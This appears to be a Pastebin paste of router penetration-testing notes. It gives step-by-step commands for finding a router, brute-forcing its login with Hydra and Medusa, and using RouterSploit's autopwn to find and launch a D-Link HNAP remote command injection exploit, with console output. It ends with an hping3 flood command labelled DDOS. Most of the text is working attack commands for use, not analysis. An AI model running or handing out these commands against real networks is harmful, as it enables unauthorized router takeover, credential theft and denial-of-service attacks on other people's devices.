Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Router Penetration Testing
- ===========================
- Router is the central connecting device, which provides the connectivity to all the end devices and nodes along with the network components of a particular network. Router Pentesting is a process in which a network auditor has seen cross check all the possible information gathering as well as exploitation methods as per the router. The goal of router pentesting is to know scope of network by identifying the total number of access points, MAC address of each router, model number of router, company name of router, firmware version.
- There are two types of attacking procedures for that :
- Active Router Attack : In this attack we try to attack directly on the Router’s IP which is 192.168.0.1 or 192.168.1.1 mostly and try to halt the services in the network and getting the juicy data out of the Router.
- Eg. Credentials Brute force attack, Wifi Jammer etc. on Public Networks
- Passive Router Attack: In this attack we do not engage the router in the process moreover we play with the broadcasted packets data generated by the router. The attack doesn’t goes directly to the Router but the attacker can use the data which is being originated from the or through the router and moving on.
- Eg. Sniffing and Monitoring the WIFI Traffic, doing MITM and other things.
- Attack Vectors
- Information Gathering of the Router :
- When connected to the network :
- Terminal : route -n
- Terminal : netdiscover -r 192.168.0.1/24
- (This can be used for getting the MAC address of the router)
- When we got the MAC address : https://www.macvendorlookup.com/ can be used for getting the Vendor Name.
- How to find out more about Router Vendor : (When the MAC Address is spoofed)
- Airmon-ng start wlan0
- Airodump-ng -M --bssid -c wlan0mon. (Big Window)
- -----------------------------------------------------------------
- http://192-168-1-1ip.mobi/default-router-passwords-list/
- http://www.routerpasswords.com/
- https://www.bestvpn.com/default-router-login-details/
- Brute Forcing on Default Credentials :
- Default credentials are those which are not changed after the purchase of the Router itself, these are the Router Login page Credentials.
- Mostly the Username goes with Admin only.
- For Brute Forcing we are gonna using some advanced brute force tools which are pre-installed in Kali Linux.
- Tools : Hydra, Medusa, Xhydra, Burpsuite
- Attacking Methods:
- Hydra : #hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
- Here, -l : username, -P : Passwords, where we put a dictionary of credentials, Rockyou.txt , http-get / http-post : Way of transmission of data , 192.168.0.1 : Default Router's IP Address.
- Medusa : #medusa -h 192.168.0.1 -u Admin -P <dictionary file> -M http
- Here, -h : Target IP Address , -u : Username , -P : Password, here we can embed Dictionary if credentials, -M : Method of transmission
- Routersploit Framework (RSF)
- ========================
- It is a tool written in python used for automating the process of router exploitation. This is not pre-installed in Kali Linux, so we have to get it from external sources.
- Downloading Steps :
- Installation on Kali Linux :
- apt-get install python3-pip
- git clone https://www.github.com/threat9/routersploit
- cd routersploit
- python3 -m pip install -r requirements.txt
- python3 rsf.py
- Running Steps :
- When the Routersploit Framework is on,
- rsf > help (For help Menu)
- Global commands:
- help - Print this help menu
- use <module> - Select a module for usage
- exec <shell command> <args> - Execute a command in a shell
- search <search term> - Search for appropriate module
- exit - Exit RouterSploit
- rsf > use scanners/ (Using Scanners : Will show the list of every scanner)
- scanners/2wire_scan
- scanners/billion_scan
- scanners/huawei_scan
- scanners/netcore_scan
- scanners/tplink_scan
- scanners/3com_scan
- scanners/cameras_scan
- scanners/ipfire_scan
- scanners/netgear_scan
- scanners/ubiquiti_scan
- scanners/asmax_scan
- scanners/cisco_scan
- scanners/juniper_scan
- scanners/netsys_scan
- scanners/zte_scan
- scanners/asus_scan
- scanners/comtrend_scan
- scanners/linksys_scan
- scanners/routers_scan
- scanners/zyxel_scan
- scanners/autopwn
- scanners/dlink_scan
- scanners/misc_scan
- scanners/shuttle_scan
- scanners/belkin_scan
- scanners/fortinet_scan
- scanners/movistar_scan
- scanners/technicolor_scan
- scanners/bhu_scan
- scanners/grandstream_scan
- scanners/multi_scan
- scanners/thomson_scan
- rsf > use scanners/autopwn (using autoseatch)
- rsf (AutoPwn) > show options
- Target options:
- Name Current settings Description
- ---- ---------------- -----------
- target Target IP address e.g. 192.168.1.1
- port 80 Target port
- Module options:
- Name Current settings Description
- ---- ---------------- -----------
- threads 8 Number of threads
- rsf (AutoPwn) >
- rsf (AutoPwn) > set target 192.168.0.1
- [+] {'target': '192.168.0.1'}
- rsf (AutoPwn) > show options
- Target options:
- Name Current settings Description
- ---- ---------------- -----------
- target 192.168.0.1 Target IP address e.g. 192.168.1.1
- port 80 Target port
- Module options:
- Name Current settings Description
- ---- ---------------- -----------
- threads 8 Number of threads
- rsf (AutoPwn) >
- [*] Could not verify exploitability:
- - exploits/routers/dlink/dsl_2740r_dns_change
- - exploits/routers/dlink/dir_815_850l_rce
- - exploits/routers/dlink/dsl_2640b_dns_change
- - exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
- - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
- - exploits/routers/shuttle/915wm_dns_change
- - exploits/routers/billion/5200w_rce
- - exploits/routers/cisco/catalyst_2960_rocem
- - exploits/routers/cisco/secure_acs_bypass
- [+] Device is vulnerable:
- - exploits/routers/dlink/multi_hnap_rce
- rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
- rsf (D-Link Multi HNAP RCE) > show options
- Target options:
- Name Current settings Description
- ---- ---------------- -----------
- target Target address e.g. http://192.168.1.1
- port 80 Target Port
- rsf (D-Link Multi HNAP RCE) > set target 192.168.0.1
- [+] {'target': '192.168.0.1'}
- rsf (D-Link Multi HNAP RCE) > show options
- Target options:
- Name Current settings Description
- ---- ---------------- -----------
- target http://192.168.0.1 Target address e.g. http://192.168.1.1
- port 80 Target Port
- rsf (D-Link Multi HNAP RCE) >
- rsf (D-Link Multi HNAP RCE) > run
- [*] Running module...
- [*] Target might be vulnerable - it is hard to verify
- [*] Invoking command loop...
- [*] It is blind command injection, response is not available
- [+] Welcome to cmd. Commands are sent to the target via the execute method.
- [*] Depending on the vulnerability, command's results might not be available.
- [*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
- -----------------------------------------------------------------
- DDOS
- hping3 192.168.195.183 -c 100000000000 -d 999999999 --rand-source --flood -p 3306
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement